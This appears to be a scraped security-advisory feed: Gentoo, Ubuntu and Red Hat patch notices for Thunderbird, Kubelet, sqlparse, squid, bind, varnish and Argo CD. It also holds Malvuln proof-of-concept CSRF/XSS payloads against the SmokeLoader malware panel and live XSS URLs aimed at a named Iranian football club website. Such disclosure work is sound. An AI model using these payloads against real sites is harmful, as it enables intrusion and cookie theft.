Gentoo Linux Security Advisory 202405-32 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: May 12, 2024  
     Bugs: #925123, #926533, #930381  
       ID: 202405-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.10.0    >= 115.10.0  
mail-client/thunderbird-bin  < 115.10.0    >= 115.10.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.10.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.10.0"

References  
==========

[ 1 ] CVE-2024-1546  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1546  
[ 2 ] CVE-2024-1547  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1547  
[ 3 ] CVE-2024-1548  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1548  
[ 4 ] CVE-2024-1549  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1549  
[ 5 ] CVE-2024-1550  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1550  
[ 6 ] CVE-2024-1551  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1551  
[ 7 ] CVE-2024-1552  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1552  
[ 8 ] CVE-2024-1553  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1553  
[ 9 ] CVE-2024-1936  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1936  
[ 10 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 11 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 12 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 13 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 14 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 15 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 16 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-32

Gentoo Linux Security Advisory 202405-31 - A vulnerability has been discovered in Kubelet, which can lead to privilege escalation. Versions greater than or equal to 1.28.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-31  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Kubelet: Privilege Escalation  
     Date: May 12, 2024  
     Bugs: #918665  
       ID: 202405-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Kubelet, which can lead to  
privilege escalation.

Background  
==========

Kubelet is a Kubernetes Node Agent.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
sys-cluster/kubelet  < 1.28.5      >= 1.28.5

Description  
===========

A vulnerability has been discovered in Kubelet. Please review the CVE  
identifier referenced below for details.

Impact  
======

A security issue was discovered in Kubernetes where a user that can  
create pods and persistent volumes on Windows nodes may be able to  
escalate to admin privileges on those nodes. Kubernetes clusters are  
only affected if they are using an in-tree storage plugin for Windows  
nodes.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Kubelet users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-cluster/kubelet-1.28.5"

References  
==========

[ 1 ] CVE-2023-5528  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5528

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-31

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-31

Ubuntu Security Notice 6771-1 - It was discovered that SQL parse incorrectly handled certain nested lists. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6771-1  
May 13, 2024

sqlparse vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

SQL parse could be made to denial of service if it received a specially crafted input.

Software Description:  
- sqlparse: documentation for non-validating SQL parser in Python

Details:

It was discovered that SQL parse incorrectly handled certain nested lists.  
An attacker could possibly use this issue to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-sqlparse                0.4.4-1ubuntu0.1

Ubuntu 23.10  
  python3-sqlparse                0.4.2-1ubuntu1.1

Ubuntu 22.04 LTS  
  python3-sqlparse                0.4.2-1ubuntu0.22.04.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6771-1  
  CVE-2024-4340

Package Information:  
  https://launchpad.net/ubuntu/+source/sqlparse/0.4.4-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/sqlparse/0.4.2-1ubuntu1.1  
  https://launchpad.net/ubuntu/+source/sqlparse/0.4.2-1ubuntu0.22.04.2

Ubuntu Security Notice USN-6771-1

Panel.SmokeLoader malware suffers from cross site request forgery, and cross site scripting vulnerabilities.

**Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting**

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSSFamily: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0682Disclosure: The smokebot admin web panel is written in PHP for remote administration capability.The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM using POST method, however there is no CSRF security token used by the FORM. This is a unique token per session within the FORM, used as a challenge to the server to help prevent cross-site-scripting attacks. Therefore, third-party adversaries who can lure a panel user to visit an attacker controlled webpage or click an infected link may result in the panel users submitting FORMS on an attackers behalf. This may result in code execution, data theft, GEO location disclosure. The CSRF to XSS results in stored JS payload in the smoke MySQL database table "plugins".hash   fgfilter   fakedns_rules   filesearch_rules   procmon_rules   ddos_rules   keylog_rules   fgcookies   miner_rules   93666df0833e0b63917e5373812613               0   ""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l...Exploit/PoC:1) CSRF to add your own Miner Pool%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3E2) CSRF to Persistent XSS%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="300" value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting

Panel.SmokeLoader malware suffers from a cross site scripting vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Scripting (XSS)Family: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0681Disclosure: 05/11/2024Description: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM that uses $_SERVER["PHP_SELF"] for the form action method. This is a super global variable that returns the filename of the currently executing script. There is no secure coding practices of filtering input or sanitization of output e.g "htmlspecialchars()". Therefore, panel users who visit a third-party adversary website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the smokebot web interface.PHP snippet.if ($_GET["mode"] === "reports"){   $url_pattern = $_GET["logs_sru"];   $id_pattern = $_GET["logs_sri"];$action = $_SERVER["PHP_SELF"]."?page=stealer&mode=reports";%3Cform method=\"get\" action=\"{$action}\"%3EInterestingly, they use PHP function htmlspecialchars() when retrieving data from the "smoke bot" MySQL database.$r = mysqli_query($dbcon,"SELECT * FROM `stealer` WHERE `cname`='{$id}'");   while ($v = mysqli_fetch_assoc($r)){   $stealer_host = htmlspecialchars($v["host"]);However, it doesn't wrap $_SERVER["PHP_SELF"] on the action method for the FORM {$action} variable that handles user input.Exploit/PoC:1) http://x.x.x.x/SmokeLoader/control1.php?page=stealer&mode=reports&logs_sri=%22/%3E%3Cscript%3Ewindow.open("https://malvuln.com")%3C/script%3E&logs_sru=&next=12) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sri=%22/%3E%3Cscript%3Ealert((document.cookie)%3C/script%3E3) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sru=%22/%3E%3Cscript%3Ewindow.open('https://hyp3rlinx.altervista.org/')%3C/script%3E4) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_srd=%22/%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0681 Cross Site Scripting

Esteghlal F.C.'s site suffers from a cross site scripting vulnerability.

**Esteghlal F.C. Cross Site Scripting**

    EXPLOIT XSS Esteghlal F.C. (باشگاه فوتبال استقلال تهران) Sitehttps://fcesteghlal.ir   suffers from a remote XSS vulnerability.This security incident was reported by the SOC and Maher team and prevention centers and was ignoredthis site has not responded to their reports so we are posting this to add visibility to the issue.#################################################################################################### ##   Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability.   ## ## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Portal Link :   https://fcesteghlal.ir/   ## ## Security Risk : high ## ## Description : All sites coded and designed by novinvision ## ## DorK : fcesteghlal.ir/search?term= ## ##################################################################################################### ## Expl0iTs:   https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)>##   https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script>

Esteghlal F.C. Cross Site Scripting

Red Hat Security Advisory 2024-2822-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2822.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid:4 security updateAdvisory ID:        RHSA-2024:2822-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2822Issue date:         2024-05-13Revision:           03CVE Names:          CVE-2024-25111====================================================================Summary: An update for the squid:4 module is now available for Red Hat Enterprise Linux8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supportingFTP, and HTTP data objects.Security Fix(es):* Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25111References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268366

Red Hat Security Advisory 2024-2822-03

Red Hat Security Advisory 2024-2821-03 - An update for bind and dhcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2821.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: bind and dhcp security updateAdvisory ID:        RHSA-2024:2821-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2821Issue date:         2024-05-13Revision:           03CVE Names:          CVE-2023-4408====================================================================Summary: An update for bind and dhcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.Security Fix(es):* bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)* bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4408References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263896https://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-2821-03

Red Hat Security Advisory 2024-2820-03 - An update for varnish is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2820.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: varnish security updateAdvisory ID:        RHSA-2024:2820-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2820Issue date:         2024-05-13Revision:           03CVE Names:          CVE-2024-30156====================================================================Summary: An update for varnish is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-30156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271486

Red Hat Security Advisory 2024-2820-03

Red Hat Security Advisory 2024-2817-03 - An update is now available for Red Hat OpenShift GitOps v1.10.5 for Argo CD UI and Console Plugin. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2817.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Errata Advisory for Red Hat OpenShift GitOps v1.10.5 security update  
Advisory ID:        RHSA-2024:2817-03  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2817  
Issue date:         2024-05-10  
Revision:           03  
CVE Names:          CVE-2024-29180  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps v1.10.5 for Argo CD UI and Console Plugin. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Errata Advisory for Red Hat OpenShift GitOps v1.10.5.

Security Fix(es):

* argo-cd: webpack-dev-middleware: lack of URL validation may lead to file leak (CVE-2024-29180).

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

1. Fix for a critical bug reported by customers where IgnoreDifferences Option  
in Sync Options was not working for array fields in ArgoCD. This fix will allow the users to ignore specific fields in the array when specified in  
ignoreDifferences during Sync.

2. A fix that enables customer to add clusters hosted on GCP to ArgoCD.

3. An important customer fix that ensures that Argo CD correctly reports support for these host key algorithms during the handshake process, allowing the pull from Azure DevOps Repos to succeed.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-29180

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/gitops/1.10/release_notes/gitops-release-notes.html  
https://docs.openshift.com/gitops/1.10/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2270863  
https://issues.redhat.com/browse/GITOPS-4226  
https://issues.redhat.com/browse/GITOPS-4513  
https://issues.redhat.com/browse/GITOPS-4543  
https://issues.redhat.com/browse/GITOPS-4645

Tag

#vulnerability